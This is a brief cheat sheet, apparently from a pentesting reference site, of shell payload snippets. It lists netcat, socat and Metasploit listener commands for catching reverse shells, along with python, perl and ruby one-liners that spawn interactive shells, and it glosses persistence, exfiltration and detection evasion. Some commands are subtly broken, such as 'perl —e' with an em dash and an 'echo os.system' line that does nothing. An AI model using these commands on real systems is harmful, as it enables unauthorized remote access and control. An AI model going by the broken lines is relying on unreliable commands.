🧠 Shell Payload Snippets

These payloads are for educational purposes and authorized security testing only. Using these payloads against systems without explicit permission is illegal. Always obtain proper authorization before using any of these techniques.

Common Listener Commands: • nc -lvnp 4444 (Netcat listener) • rlwrap nc -lvnp 4444 (Netcat with readline) • socat file:`tty`,raw,echo=0 tcp-listen:4444 (Socat listener) • msfconsole -q -x "use multi/handler; set payload linux/x86/shell_reverse_tcp; set lhost IP; set lport PORT; run" Shell Upgrade Commands: • python -c 'import pty; pty.spawn("/bin/bash")' • python3 -c 'import pty; pty.spawn("/bin/bash")' • echo os.system('/bin/bash') • /bin/sh -i • perl —e 'exec "/bin/sh";' • ruby: exec "/bin/sh"

Reverse Shells: Connect back to attacker's machine. Useful when target is behind firewall. Requires listener on attacker machine. Bind Shells: Open a port on target machine. Attacker connects to this port. May be blocked by firewalls. Web Shells: Scripts uploaded to web servers for remote command execution. Accessed through web browser. Privilege Escalation: Techniques to gain higher privileges on compromised systems. Often combined with local exploits. Persistence: Methods to maintain access to compromised systems. Includes backdoors, scheduled tasks, and service modifications. Enumeration: Commands to gather information about the target system. Includes system info, network config, and user enumeration. File Transfer: Methods to transfer files between attacker and target. Useful for uploading tools or exfiltrating data. Encoding/Obfuscation: Techniques to bypass filters and detection systems. Includes base64, hex, and other encoding methods.